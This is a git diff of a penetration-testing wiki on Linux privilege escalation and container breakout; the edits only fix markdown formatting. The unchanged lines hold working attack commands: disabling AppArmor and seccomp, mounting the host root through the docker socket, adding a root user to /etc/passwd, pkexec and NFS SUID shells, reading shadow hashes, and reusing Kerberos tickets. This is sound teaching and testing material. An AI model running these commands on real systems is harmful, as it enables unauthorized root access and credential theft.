-* **Use **[**official docker images**](https://docs.docker.com/docker-hub/official\_images/) **and require signatures **or build your own based on them. Don’t inherit or use [backdoored](https://arstechnica.com/information-technology/2018/06/backdoored-images-downloaded-5-million-times-finally-removed-from-docker-hub/) images. Also store root keys, passphrase in a safe place. Docker has plans to manage keys with UCP.
+* **Adjust** [**seccomp**](https://docs.docker.com/engine/security/seccomp/)**,** [**AppArmor**](https://docs.docker.com/engine/security/apparmor/) **(or SELinux)** profiles to restrict the actions and syscalls available for the container to the minimum required.
+* **Use** [**official docker images**](https://docs.docker.com/docker-hub/official\_images/) **and require signatures** or build your own based on them. Don’t inherit or use [backdoored](https://arstechnica.com/information-technology/2018/06/backdoored-images-downloaded-5-million-times-finally-removed-from-docker-hub/) images. Also store root keys, passphrase in a safe place. Docker has plans to manage keys with UCP.
 * **Regularly** **rebuild** your images to **apply security patches to the host an images.**
 * Manage your **secrets wisely** so it's difficult to the attacker to access them.
 * If you **exposes the docker daemon use HTTPS** with client & server authentication.
diff --git a/linux-unix/privilege-escalation/docker-breakout/apparmor.md b/linux-unix/privilege-escalation/docker-breakout/apparmor.md
index 7849a6d5..96f4af56 100644
--- a/linux-unix/privilege-escalation/docker-breakout/apparmor.md
+++ b/linux-unix/privilege-escalation/docker-breakout/apparmor.md
@@ -2,7 +2,7 @@
 
 ## Basic Information
 
-**AppArmor** is a kernel enhancement to confine **programs** to a **limited** set of **resources **with **per-program profiles**. Profiles can **allow** **capabilities** like network access, raw socket access, and the permission to read, write, or execute files on matching paths.
+**AppArmor** is a kernel enhancement to confine **programs** to a **limited** set of **resources** with **per-program profiles**. Profiles can **allow** **capabilities** like network access, raw socket access, and the permission to read, write, or execute files on matching paths.
 
 It's a Mandatory Access Control or **MAC** that binds **access control** attributes **to programs rather than to users**.\
 AppArmor confinement is provided via **profiles loaded into the kernel**, typically on boot.\
@@ -42,7 +42,7 @@ aa-mergeprof  #used to merge the policies
 ## Creating a profile
 
 * In order to indicate the affected executable, **absolute paths and wildcards** are allowed (for file globbing) for specifying files.
-* To indicate the access the binary will have over **files** the following **access controls** can be used: 
+* To indicate the access the binary will have over **files** the following **access controls** can be used:&#x20;
   * **r** (read)
   * **w** (write)
   * **m** (memory map as executable)
@@ -204,7 +204,7 @@ Once you **run a docker container** you should see the following output:
    docker-default (825)
 ```
 
-Note that **apparmor will even block capabilities privileges** granted to the container by default. For example, it will be able to **block permission to write inside /proc even if the SYS_ADMIN capability is granted** because by default docker apparmor profile denies this access:
+Note that **apparmor will even block capabilities privileges** granted to the container by default. For example, it will be able to **block permission to write inside /proc even if the SYS\_ADMIN capability is granted** because by default docker apparmor profile denies this access:
 
 ```bash
 docker run -it --cap-add SYS_ADMIN --security-opt seccomp=unconfined ubuntu /bin/bash
@@ -218,12 +218,12 @@ You need to **disable apparmor** to bypass its restrictions:
 docker run -it --cap-add SYS_ADMIN --security-opt seccomp=unconfined --security-opt apparmor=unconfined ubuntu /bin/bash
 ```
 
-Note that by default **AppArmor** will also **forbid the container to mount** folders from the inside even with SYS_ADMIN capability.
+Note that by default **AppArmor** will also **forbid the container to mount** folders from the inside even with SYS\_ADMIN capability.
 
 Note that you can **add/remove** **capabilities** to the docker container (this will be still restricted by protection methods like **AppArmor** and **Seccomp**):
 
-* `--cap-add=SYS_ADMIN`_ _give_ _`SYS_ADMIN` cap
-* `--cap-add=ALL`_ _give_ _all caps
+* `--cap-add=SYS_ADMIN` __ give __ `SYS_ADMIN` cap
+* `--cap-add=ALL` __ give __ all caps
 * `--cap-drop=ALL --cap-add=SYS_PTRACE` drop all caps and only give `SYS_PTRACE`
 
 {% hint style="info" %}
diff --git a/linux-unix/privilege-escalation/docker-breakout/authz-and-authn-docker-access-authorization-plugin.md b/linux-unix/privilege-escalation/docker-breakout/authz-and-authn-docker-access-authorization-plugin.md
index 3db790c7..40cb3712 100644
--- a/linux-unix/privilege-escalation/docker-breakout/authz-and-authn-docker-access-authorization-plugin.md
+++ b/linux-unix/privilege-escalation/docker-breakout/authz-and-authn-docker-access-authorization-plugin.md
@@ -1,6 +1,6 @@
 # AuthZ& AuthN - Docker Access Authorization Plugin
 
-**Docker’s** out-of-the-box **authorization** model is **all or nothing**. Any user with permission to access the Docker daemon can **run any** Docker client **command**. The same is true for callers using Docker’s Engine API to contact the daemon. If you require **greater access control**, you can create **authorization plugins** and add them to your Docker daemon configuration. Using an authorization plugin, a Docker administrator can **configure granular access **policies for managing access to the Docker daemon.
+**Docker’s** out-of-the-box **authorization** model is **all or nothing**. Any user with permission to access the Docker daemon can **run any** Docker client **command**. The same is true for callers using Docker’s Engine API to contact the daemon. If you require **greater access control**, you can create **authorization plugins** and add them to your Docker daemon configuration. Using an authorization plugin, a Docker administrator can **configure granular access** policies for managing access to the Docker daemon.
 
 ## Basic architecture
 
@@ -10,11 +10,11 @@ When an **HTTP** **request** is made to the Docker **daemon** through the CLI or
 
 The sequence diagrams below depict an allow and deny authorization flow:
 
-![Authorization Allow flow](https://docs.docker.com/engine/extend/images/authz_allow.png)
+![Authorization Allow flow](https://docs.docker.com/engine/extend/images/authz\_allow.png)
 
-![Authorization Deny flow](https://docs.docker.com/engine/extend/images/authz_deny.png)
+![Authorization Deny flow](https://docs.docker.com/engine/extend/images/authz\_deny.png)
 
-Each request sent to the plugin **includes the authenticated user, the HTTP headers, and the request/response body**. Only the **user name** and the **authentication method **used are passed to the plugin. Most importantly, **no** user **credentials** or tokens are passed. Finally, **not all request/response bodies are sent** to the authorization plugin. Only those request/response bodies where the `Content-Type` is either `text/*` or `application/json` are sent.
+Each request sent to the plugin **includes the authenticated user, the HTTP headers, and the request/response body**. Only the **user name** and the **authentication method** used are passed to the plugin. Most importantly, **no** user **credentials** or tokens are passed. Finally, **not all request/response bodies are sent** to the authorization plugin. Only those request/response bodies where the `Content-Type` is either `text/*` or `application/json` are sent.
 
 For commands that can potentially hijack the HTTP connection (`HTTP Upgrade`), such as `exec`, the authorization plugin is only called for the initial HTTP requests. Once the plugin approves the command, authorization is not applied to the rest of the flow. Specifically, the streaming data is not passed to the authorization plugins. For commands that return chunked HTTP response, such as `logs` and `events`, only the HTTP request is sent to the authorization plugins.
 
@@ -32,11 +32,11 @@ The plugin [**authz**](https://github.com/twistlock/authz) allows you to create
 
 This is an example that will allow Alice and Bob can create new containers: `{"name":"policy_3","users":["alice","bob"],"actions":["container_create"]}`
 
-In the page [route_parser.go](https://github.com/twistlock/authz/blob/master/core/route_parser.go) you can find the relation between the requested URL and the action. In the page [types.go](https://github.com/twistlock/authz/blob/master/core/types.go) you can find the relation between the action name and the action
+In the page [route\_parser.go](https://github.com/twistlock/authz/blob/master/core/route\_parser.go) you can find the relation between the requested URL and the action. In the page [types.go](https://github.com/twistlock/authz/blob/master/core/types.go) you can find the relation between the action name and the action
 
 ### Simple Plugin Tutorial
 
-You can find an** easy to understand plugin** with detailed information about installation and debugging here: [**https://github.com/carlospolop-forks/authobot**](https://github.com/carlospolop-forks/authobot)****
+You can find an **easy to understand plugin** with detailed information about installation and debugging here: [**https://github.com/carlospolop-forks/authobot**](https://github.com/carlospolop-forks/authobot)****
 
 Read the `README` and the `plugin.go` code to understand how is it working.
 
@@ -46,7 +46,7 @@ Read the `README` and the `plugin.go` code to understand how is it working.
 
 The main things to check are the **which endpoints are allowed** and **which values of HostConfig are allowed**.
 
-To perform this enumeration you can **use the tool **[**https://github.com/carlospolop/docker_auth_profiler**](https://github.com/carlospolop/docker_auth_profiler)**.**
+To perform this enumeration you can **use the tool** [**https://github.com/carlospolop/docker\_auth\_profiler**](https://github.com/carlospolop/docker\_auth\_profiler)**.**
 
 ### disallowed `run --privileged`
 
@@ -127,7 +127,7 @@ docker exec -it f6932bc153ad chroot /host bash #Get a shell inside of it
 ```
 
 {% hint style="warning" %}
-Note how in this example we are using the **`Binds `**param as a root level key in the JSON but in the API it appears under the key **`HostConfig`**
+Note how in this example we are using the **`Binds`** param as a root level key in the JSON but in the API it appears under the key **`HostConfig`**
 {% endhint %}
 
 #### Binds in HostConfig
@@ -156,7 +156,7 @@ curl --unix-socket /var/run/docker.sock -H "Content-Type: application/json" -d '
 
 ### Unchecked JSON Attribute
 
-It's possible that when the sysadmin configured the docker firewall he **forgot about some important attribute of a parameter** of the [**API**](https://docs.docker.com/engine/api/v1.40/#operation/ContainerList) like "**Capabilities**" inside "**HostConfig**". In the following example it's possible to abuse this misconfiguration to create and run a container with the **SYS_MODULE** capability:
+It's possible that when the sysadmin configured the docker firewall he **forgot about some important attribute of a parameter** of the [**API**](https://docs.docker.com/engine/api/v1.40/#operation/ContainerList) like "**Capabilities**" inside "**HostConfig**". In the following example it's possible to abuse this misconfiguration to create and run a container with the **SYS\_MODULE** capability:
 
 ```bash
 docker version
@@ -196,4 +196,4 @@ Remember to **re-enable the plugin after escalating**, or a **restart of docker
 
 ## References
 
-* [https://docs.docker.com/engine/extend/plugins_authorization/](https://docs.docker.com/engine/extend/plugins_authorization/)
+* [https://docs.docker.com/engine/extend/plugins\_authorization/](https://docs.docker.com/engine/extend/plugins\_authorization/)
diff --git a/linux-unix/privilege-escalation/docker-breakout/seccomp.md b/linux-unix/privilege-escalation/docker-breakout/seccomp.md
index 8b88f4ea..cb5fe2db 100644
--- a/linux-unix/privilege-escalation/docker-breakout/seccomp.md
+++ b/linux-unix/privilege-escalation/docker-breakout/seccomp.md
@@ -2,7 +2,7 @@
 
 ## Basic Information
 
-**Seccomp **or Secure Computing mode, in summary, is a feature of Linux kernel which can act as **syscall filter**.\
+**Seccomp** or Secure Computing mode, in summary, is a feature of Linux kernel which can act as **syscall filter**.\
 Seccomp has 2 modes.
 
 **seccomp** (short for **secure computing mode**) is a computer security facility in the **Linux** **kernel**. seccomp allows a process to make a one-way transition into a "secure" state where **it cannot make any system calls except** `exit()`, `sigreturn()`, `read()` and `write()` to **already-open** file descriptors. Should it attempt any other system calls, the **kernel** will **terminate** the **process** with SIGKILL or SIGSYS. In this sense, it does not virtualize the system's resources but isolates the process from them entirely.
@@ -13,7 +13,7 @@ seccomp mode is **enabled via the `prctl(2)` system call** using the `PR_SET_SEC
 
 ### **Original/Strict Mode**
 
-In this mode** **Seccomp **only allow the syscalls**  `exit()`, `sigreturn()`, `read()` and `write()` to already-open file descriptors. If any other syscall is made, the process is killed using SIGKILL
+In this mode **** Seccomp **only allow the syscalls**  `exit()`, `sigreturn()`, `read()` and `write()` to already-open file descriptors. If any other syscall is made, the process is killed using SIGKILL
 
 {% code title="seccomp_strict.c" %}
 ```c
@@ -105,7 +105,7 @@ void main(void) {
 
 ## Seccomp in Docker
 
-**Seccomp-bpf** is supported by **Docker **to restrict the **syscalls **from the containers effectively decreasing the surface area. You can find the **syscalls blocked **by **default **in [https://docs.docker.com/engine/security/seccomp/](https://docs.docker.com/engine/security/seccomp/) and the **default seccomp profile **can be found here [https://github.com/moby/moby/blob/master/profiles/seccomp/default.json](https://github.com/moby/moby/blob/master/profiles/seccomp/default.json).\
+**Seccomp-bpf** is supported by **Docker** to restrict the **syscalls** from the containers effectively decreasing the surface area. You can find the **syscalls blocked** by **default** in [https://docs.docker.com/engine/security/seccomp/](https://docs.docker.com/engine/security/seccomp/) and the **default seccomp profile** can be found here [https://github.com/moby/moby/blob/master/profiles/seccomp/default.json](https://github.com/moby/moby/blob/master/profiles/seccomp/default.json).\
 You can run a docker container with a **different seccomp** policy with:
 
 ```bash
@@ -115,9 +115,9 @@ docker run --rm \
              hello-world
 ```
 
-If you want for example to **forbid **a container of executing some **syscall **like` uname` you could download the default profile from [https://github.com/moby/moby/blob/master/profiles/seccomp/default.json](https://github.com/moby/moby/blob/master/profiles/seccomp/default.json) and just **remove the `uname` string from the list**.\
+If you want for example to **forbid** a container of executing some **syscall** like `uname` you could download the default profile from [https://github.com/moby/moby/blob/master/profiles/seccomp/default.json](https://github.com/moby/moby/blob/master/profiles/seccomp/default.json) and just **remove the `uname` string from the list**.\
 If you want to make sure that **some binary doesn't work inside a a docker container** you could use strace to list the syscalls the binary is using and then forbid them.\
-In the following example the **syscalls **of `uname` are discovered:
+In the following example the **syscalls** of `uname` are discovered:
 
 ```bash
 docker run -it --security-opt seccomp=default.json modified-ubuntu strace uname
diff --git a/linux-unix/privilege-escalation/escaping-from-limited-bash.md b/linux-unix/privilege-escalation/escaping-from-limited-bash.md
index d39dd5f0..9ac6f551 100644
--- a/linux-unix/privilege-escalation/escaping-from-limited-bash.md
+++ b/linux-unix/privilege-escalation/escaping-from-limited-bash.md
@@ -6,9 +6,9 @@
 
 ## Chroot limitation
 
-From [wikipedia](https://en.wikipedia.org/wiki/Chroot#Limitations):  The chroot mechanism is** not intended to defend** against intentional tampering by **privileged **(**root**) **users**. On most systems, chroot contexts do not stack properly and chrooted programs **with sufficient privileges may perform a second chroot to break out**.
+From [wikipedia](https://en.wikipedia.org/wiki/Chroot#Limitations):  The chroot mechanism is **not intended to defend** against intentional tampering by **privileged** (**root**) **users**. On most systems, chroot contexts do not stack properly and chrooted programs **with sufficient privileges may perform a second chroot to break out**.
 
-Therefore, if you are **root **inside a chroot you **can escape **creating **another chroot**. However, in several cases inside the first chroot you won't be able to execute the chroot command, therefore you will need to compile a binary like the following one and run it:
+Therefore, if you are **root** inside a chroot you **can escape** creating **another chroot**. However, in several cases inside the first chroot you won't be able to execute the chroot command, therefore you will need to compile a binary like the following one and run it:
 
 {% code title="break_chroot.c" %}
 ```c
@@ -144,9 +144,9 @@ Tricks about escaping from python jails in the following page:
 
 ## Lua Jails
 
-In this page you can find the global functions you have access to inside lua: [https://www.gammon.com.au/scripts/doc.php?general=lua_base](https://www.gammon.com.au/scripts/doc.php?general=lua_base)
+In this page you can find the global functions you have access to inside lua: [https://www.gammon.com.au/scripts/doc.php?general=lua\_base](https://www.gammon.com.au/scripts/doc.php?general=lua\_base)
 
-**Eval **with command execution**:**
+**Eval** with command execution**:**
 
 ```bash
 load(string.char(0x6f,0x73,0x2e,0x65,0x78,0x65,0x63,0x75,0x74,0x65,0x28,0x27,0x6c,0x73,0x27,0x29))()
diff --git a/linux-unix/privilege-escalation/interesting-groups-linux-pe/README.md b/linux-unix/privilege-escalation/interesting-groups-linux-pe/README.md
index f25450ff..99a4bdf4 100644
--- a/linux-unix/privilege-escalation/interesting-groups-linux-pe/README.md
+++ b/linux-unix/privilege-escalation/interesting-groups-linux-pe/README.md
@@ -16,7 +16,7 @@
 
 This means that **any user that belongs to the group sudo or admin can execute anything as sudo**.
 
-If this is the case, to** become root you can just execute**:
+If this is the case, to **become root you can just execute**:
 
 ```
 sudo su
@@ -30,22 +30,22 @@ Find all suid binaries and check if there is the binary **Pkexec**:
 find / -perm -4000 2>/dev/null
 ```
 
-If you find that the binar**y pkexec is a SUID** binary and you belong to **sudo **or **admin**, you could probably execute binaries as sudo using `pkexec`.\
+If you find that the binar**y pkexec is a SUID** binary and you belong to **sudo** or **admin**, you could probably execute binaries as sudo using `pkexec`.\
 This is because typically those are the groups inside the **polkit policy**. This policy basically identifies which groups can use `pkexec`. Check it with:
 
 ```bash
 cat /etc/polkit-1/localauthority.conf.d/*
 ```
 
-There you will find which groups are allowed to execute **pkexec** and **by default** in some linux disctros the groups **sudo **and** admin** appear.
+There you will find which groups are allowed to execute **pkexec** and **by default** in some linux disctros the groups **sudo** and **admin** appear.
 
-To** become root you can execute**:
+To **become root you can execute**:
 
 ```bash
 pkexec "/bin/sh" #You will be prompted for your user password
 ```
 
-If you try to execute **pkexec **and you get this **error**:
+If you try to execute **pkexec** and you get this **error**:
 
 ```bash
 polkit-agent-helper-1: error response to PolicyKit daemon: GDBus.Error:org.freedesktop.PolicyKit1.Error.Failed: No session for cookie
@@ -80,7 +80,7 @@ pkttyagent --process <PID of session1> #Step 2, attach pkttyagent to session1
 
 This means that **any user that belongs to the group wheel can execute anything as sudo**.
 
-If this is the case, to** become root you can just execute**:
+If this is the case, to **become root you can just execute**:
 
 ```
 sudo su
@@ -88,7 +88,7 @@ sudo su
 
 ## Shadow Group
 
-Users from the **group shadow** can **read **the **/etc/shadow** file:
+Users from the **group shadow** can **read** the **/etc/shadow** file:
 
 ```
 -rw-r----- 1 root shadow 1824 Apr 26 19:10 /etc/shadow
@@ -98,7 +98,7 @@ So, read the file and try to **crack some hashes**.
 
 ## Disk Group
 
- This privilege is almost** equivalent to root access **as you can access all the data inside of the machine.
+&#x20;This privilege is almost **equivalent to root access** as you can access all the data inside of the machine.
 
 Files:`/dev/sd[a-z][1-9]`
 
@@ -118,7 +118,7 @@ debugfs -w /dev/sda1
 debugfs:  dump /tmp/asd1.txt /tmp/asd2.txt
 ```
 
-However, if you try to** write files owned by root **(like `/etc/shadow` or `/etc/passwd`) you will have a "**Permission denied**" error.
+However, if you try to **write files owned by root** (like `/etc/shadow` or `/etc/passwd`) you will have a "**Permission denied**" error.
 
 ## Video Group
 
@@ -130,16 +130,16 @@ yossi    tty1                      22:16    5:13m  0.05s  0.04s -bash
 moshe    pts/1    10.10.14.44      02:53   24:07   0.06s  0.06s /bin/bash
 ```
 
-The **tty1 **means that the user **yossi is logged physically** to a terminal on the machine.
+The **tty1** means that the user **yossi is logged physically** to a terminal on the machine.
 
-The **video group** has access to view the screen output. Basically you can observe the the screens. In order to do that you need to** grab the current image on the screen** in raw data and get the resolution that the screen is using. The screen data can be saved in `/dev/fb0` and you could find the resolution of this screen on `/sys/class/graphics/fb0/virtual_size`
+The **video group** has access to view the screen output. Basically you can observe the the screens. In order to do that you need to **grab the current image on the screen** in raw data and get the resolution that the screen is using. The screen data can be saved in `/dev/fb0` and you could find the resolution of this screen on `/sys/class/graphics/fb0/virtual_size`
 
 ```bash
 cat /dev/fb0 > /tmp/screen.raw
 cat /sys/class/graphics/fb0/virtual_size
 ```
 
-To **open **the **raw image** you can use **GIMP**, select the **`screen.raw` **file and select as file type **Raw image data**:
+To **open** the **raw image** you can use **GIMP**, select the **`screen.raw` ** file and select as file type **Raw image data**:
 
 ![](<../../../.gitbook/assets/image (287).png>)
 
@@ -149,7 +149,7 @@ Then modify the Width and Height to the ones used on the screen and check differ
 
 ## Root Group
 
-It looks like by default** members of root group** could have access to **modify **some **service **configuration files or some **libraries **files or** other interesting things** that could be used to escalate privileges...
+It looks like by default **members of root group** could have access to **modify** some **service** configuration files or some **libraries** files or **other interesting things** that could be used to escalate privileges...
 
 **Check which files root members can modify**:
 
@@ -173,7 +173,7 @@ echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /etc/pa
 docker run --rm -it --pid=host --net=host --privileged -v /:/mnt <imagename> chroot /mnt bashbash
 ```
 
-Finally, if you don't like any of the suggestions of before, or they aren't working for some reason (docker api firewall?) you could always try to** run a privileged container and escape from it** as explained here:
+Finally, if you don't like any of the suggestions of before, or they aren't working for some reason (docker api firewall?) you could always try to **run a privileged container and escape from it** as explained here:
 
 {% content-ref url="../docker-breakout/" %}
 [docker-breakout](../docker-breakout/)
@@ -193,7 +193,7 @@ If you have write permissions over the docker socket read [**this post about how
 
 ## Adm Group
 
-Usually **members **of the group **`adm`** have permissions to **read log **files located inside _/var/log/_.\
+Usually **members** of the group **`adm`** have permissions to **read log** files located inside _/var/log/_.\
 Therefore, if you have compromised a user inside this group you should definitely take a **look to the logs**.
 
 ## Auth group
diff --git a/linux-unix/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md b/linux-unix/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md
index c03fe43f..cb02cc0f 100644
--- a/linux-unix/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md
+++ b/linux-unix/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md
@@ -46,7 +46,7 @@ lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=t
 
 {% hint style="danger" %}
 If you find this error _**Error: No storage pool found. Please create a new storage pool**_\
-Run **`lxc init`** and **repeat **the previous chunk of commands
+Run **`lxc init`** and **repeat** the previous chunk of commands
 {% endhint %}
 
 Execute the container:
@@ -85,7 +85,7 @@ lxc start mycontainer
 lxc exec mycontainer /bin/sh
 ```
 
-Alternatively [https://github.com/initstring/lxd_root](https://github.com/initstring/lxd_root)
+Alternatively [https://github.com/initstring/lxd\_root](https://github.com/initstring/lxd\_root)
 
 ## With internet
 
diff --git a/linux-unix/privilege-escalation/ld.so.conf-example.md b/linux-unix/privilege-escalation/ld.so.conf-example.md
index 8a8d45a3..e53325b2 100644
--- a/linux-unix/privilege-escalation/ld.so.conf-example.md
+++ b/linux-unix/privilege-escalation/ld.so.conf-example.md
@@ -38,14 +38,14 @@ void say_hi()
 {% endtab %}
 {% endtabs %}
 
-1. **Create **those files in your machine in the same folder
-2. **Compile **the **library**: `gcc -shared -o libcustom.so -fPIC libcustom.c`
-3. **Copy**_** **libcustom.so _to_ /usr/lib_: `sudo cp libcustom.so /usr/lib` (root privs)
-4. **Compile **the **executable**: `gcc sharedvuln.c -o sharedvuln -lcustom`
+1. **Create** those files in your machine in the same folder
+2. **Compile** the **library**: `gcc -shared -o libcustom.so -fPIC libcustom.c`
+3. **Copy **_**** libcustom.so_ to _/usr/lib_: `sudo cp libcustom.so /usr/lib` (root privs)
+4. **Compile** the **executable**: `gcc sharedvuln.c -o sharedvuln -lcustom`
 
 ### Check the environment
 
-Check that _libcustom.so_ is being **loaded **from _/usr/lib_ and that you can **execute **the binary.
+Check that _libcustom.so_ is being **loaded** from _/usr/lib_ and that you can **execute** the binary.
 
 ```
 $ ldd sharedvuln
@@ -61,14 +61,14 @@ Hi
 
 ## Exploit
 
-In this scenario we are going to suppose that **someone has created a vulnerable entry **inside a file in _/etc/ld.so.conf/_:
+In this scenario we are going to suppose that **someone has created a vulnerable entry** inside a file in _/etc/ld.so.conf/_:
 
 ```bash
 sudo echo "/home/ubuntu/lib" > /etc/ld.so.conf.d/privesc.conf
 ```
 
 The vulnerable folder is _/home/ubuntu/lib_ (where we have writable access).\
-**Downloadand compile **the following code inside that path:
+**Downloadand compile** the following code inside that path:
 
 ```c
 //gcc -shared -o libcustom.so -fPIC libcustom.c
@@ -85,9 +85,9 @@ void say_hi(){
 }
 ```
 
-Now that we have **created the malicious libcustom library inside the misconfigured** path, we need to wait for a **reboot **or for the root user to execute **`ldconfig `**(_in case you can execute this binary as **sudo **or it has the **suid bit **you will be able to execute it yourself_).
+Now that we have **created the malicious libcustom library inside the misconfigured** path, we need to wait for a **reboot** or for the root user to execute **`ldconfig`** (_in case you can execute this binary as **sudo** or it has the **suid bit** you will be able to execute it yourself_).
 
-Once this has happened **recheck **where is the `sharevuln` executable loading the `libcustom.so` library from:
+Once this has happened **recheck** where is the `sharevuln` executable loading the `libcustom.so` library from:
 
 ```c
 $ldd sharedvuln
@@ -111,10 +111,10 @@ ubuntu
 Note that in this example we haven't escalated privileges, but modifying the commands executed and **waiting for root or other privileged user to execute the vulnerable binary** we will be able to escalate privileges.
 {% endhint %}
 
-###  Other misconfigurations - Same vuln
+### &#x20;Other misconfigurations - Same vuln
 
 In the previous example we faked a misconfiguration where an administrator **set a non-privileged folder inside a configuration file inside `/etc/ld.so.conf.d/`**.\
-But there are other misconfigurations that can cause the same vulnerability, if you have **write permissions **in some **config file **inside `/etc/ld.so.conf.d`s, in the folder `/etc/ld.so.conf.d` or in the file `/etc/ld.so.conf` you can configure the same vulnerability and exploit it.
+But there are other misconfigurations that can cause the same vulnerability, if you have **write permissions** in some **config file** inside `/etc/ld.so.conf.d`s, in the folder `/etc/ld.so.conf.d` or in the file `/etc/ld.so.conf` you can configure the same vulnerability and exploit it.
 
 ## Exploit 2
 
@@ -128,7 +128,7 @@ echo "include /tmp/conf/*" > fake.ld.so.conf
 echo "/tmp" > conf/evil.conf
 ```
 
-Now, as indicated in the **previous exploit**,** create the malicious library inside **_**/tmp**_.\
+Now, as indicated in the **previous exploit**, **create the malicious library inside **_**/tmp**_.\
 And finally, lets load the path and check where is the binary loading the library from:
 
 ```bash
diff --git a/linux-unix/privilege-escalation/linux-active-directory.md b/linux-unix/privilege-escalation/linux-active-directory.md
index 4ad6b362..1057e1e1 100644
--- a/linux-unix/privilege-escalation/linux-active-directory.md
+++ b/linux-unix/privilege-escalation/linux-active-directory.md
@@ -2,7 +2,7 @@
 
 A linux machine can also be present inside an Active Directory environment.
 
-A linux machine in an AD might be **storing different CCACHE tickets inside files. This tickets can be used and abused as any other kerberos ticket**. In order to read this tickets you will need to be the user owner of the ticket or **root **inside the machine.
+A linux machine in an AD might be **storing different CCACHE tickets inside files. This tickets can be used and abused as any other kerberos ticket**. In order to read this tickets you will need to be the user owner of the ticket or **root** inside the machine.
 
 ### Pass The Ticket
 
@@ -16,7 +16,7 @@ In this page you are going to find different places were you could **find kerber
 
 > When tickets are set to be stored as a file on disk, the standard format and type is a CCACHE file. This is a simple binary file format to store Kerberos credentials. These files are typically stored in /tmp and scoped with 600 permissions
 
-List the current ticket used for authentication with `env | grep KRB5CCNAME`. The format is portable and the ticket can be** reused by setting the environment variable** with `export KRB5CCNAME=/tmp/ticket.ccache`. Kerberos ticket name format is `krb5cc_%{uid}` where uid is the user UID.
+List the current ticket used for authentication with `env | grep KRB5CCNAME`. The format is portable and the ticket can be **reused by setting the environment variable** with `export KRB5CCNAME=/tmp/ticket.ccache`. Kerberos ticket name format is `krb5cc_%{uid}` where uid is the user UID.
 
 ```bash
 ls /tmp/ | grep krb5cc
@@ -53,7 +53,7 @@ make CONF=Release
 
 SSSD maintains a copy of the database at the path `/var/lib/sss/secrets/secrets.ldb`. The corresponding key is stored as a hidden file at the path `/var/lib/sss/secrets/.secrets.mkey`. By default, the key is only readable if you have **root** permissions.
 
-Invoking **`SSSDKCMExtractor` **with the --database and --key parameters will parse the database and **decrypt the secrets**.
+Invoking **`SSSDKCMExtractor` ** with the --database and --key parameters will parse the database and **decrypt the secrets**.
 
 ```bash
 git clone https://github.com/fireeye/SSSDKCMExtractor
@@ -98,7 +98,7 @@ python3 keytabextract.py krb5.keytab
         NTLM HASH : 31d6cfe0d16ae931b73c59d7e0c089c0 # Lucky
 ```
 
-On **macOS **you can use [**`bifrost`**](https://github.com/its-a-feature/bifrost).
+On **macOS** you can use [**`bifrost`**](https://github.com/its-a-feature/bifrost).
 
 ```bash
 ./bifrost -action dump -source keytab -path test
diff --git a/linux-unix/privilege-escalation/logstash.md b/linux-unix/privilege-escalation/logstash.md
index f9dddb49..db5b8b61 100644
--- a/linux-unix/privilege-escalation/logstash.md
+++ b/linux-unix/privilege-escalation/logstash.md
@@ -20,7 +20,7 @@ The pipeline configuration file **/etc/logstash/pipelines.yml** specifies the lo
   pipeline.workers: 6
 ```
 
-In here you can find the paths to the **.conf** files, which contain the configured pipelines. If the **Elasticsearch output module **is used, **pipelines **are likely to **contain **valid **credentials **for an Elasticsearch instance. Those credentials have often more privileges, since Logstash has to write data to Elasticsearch. If wildcards are used, Logstash tries to run all pipelines located in that folder matching the wildcard.
+In here you can find the paths to the **.conf** files, which contain the configured pipelines. If the **Elasticsearch output module** is used, **pipelines** are likely to **contain** valid **credentials** for an Elasticsearch instance. Those credentials have often more privileges, since Logstash has to write data to Elasticsearch. If wildcards are used, Logstash tries to run all pipelines located in that folder matching the wildcard.
 
 ### Privesc with writable pipelines
 
@@ -28,7 +28,7 @@ Before trying to elevate your own privileges you should check which user is runn
 
 Check whether you have **one** of the required rights:
 
-* You have **write permissions **on a pipeline **.conf** file **or**
+* You have **write permissions** on a pipeline **.conf** file **or**
 * **/etc/logstash/pipelines.yml** contains a wildcard and you are allowed to write into the specified folder
 
 Further **one** of the requirements must be met:
diff --git a/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md b/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md
index 5103d6bf..6364555f 100644
--- a/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md
+++ b/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md
@@ -1,10 +1,10 @@
-# NFS no_root_squash/no_all_squash misconfiguration PE
+# NFS no\_root\_squash/no\_all\_squash misconfiguration PE
 
-Read the_ **/etc/exports** _file, if you find some directory that is configured as **no_root_squash**, then you can **access** it from **as a client **and **write inside **that directory **as **if you were the local **root **of the machine.
+Read the _ **/etc/exports** _ file, if you find some directory that is configured as **no\_root\_squash**, then you can **access** it from **as a client** and **write inside** that directory **as** if you were the local **root** of the machine.
 
-**no_root_squash**: This option basically gives authority to the root user on the client to access files on the NFS server as root. And this can lead to serious security implications.
+**no\_root\_squash**: This option basically gives authority to the root user on the client to access files on the NFS server as root. And this can lead to serious security implications.
 
-**no_all_squash:** This is similar to **no_root_squash** option but applies to **non-root users**. Imagine, you have a shell as nobody user; checked /etc/exports file; no_all_squash option is present; check /etc/passwd file; emulate a non-root user; create a suid file as that user (by mounting using nfs). Execute the suid as nobody user and become different user.
+**no\_all\_squash:** This is similar to **no\_root\_squash** option but applies to **non-root users**. Imagine, you have a shell as nobody user; checked /etc/exports file; no\_all\_squash option is present; check /etc/passwd file; emulate a non-root user; create a suid file as that user (by mounting using nfs). Execute the suid as nobody user and become different user.
 
 ## Privilege Escalation
 
@@ -12,7 +12,7 @@ Read the_ **/etc/exports** _file, if you find some directory that is configured
 
 If you have found this vulnerability, you can exploit it:
 
-* **Mounting that directory** in a client machine, and **as root copying** inside the mounted folder the **/bin/bash** binary and giving it **SUID **rights, and **executing from the victim** machine that bash binary.
+* **Mounting that directory** in a client machine, and **as root copying** inside the mounted folder the **/bin/bash** binary and giving it **SUID** rights, and **executing from the victim** machine that bash binary.
 
 ```bash
 #Attacker, as root user
@@ -27,7 +27,7 @@ cd <SHAREDD_FOLDER>
 ./bash -p #ROOT shell
 ```
 
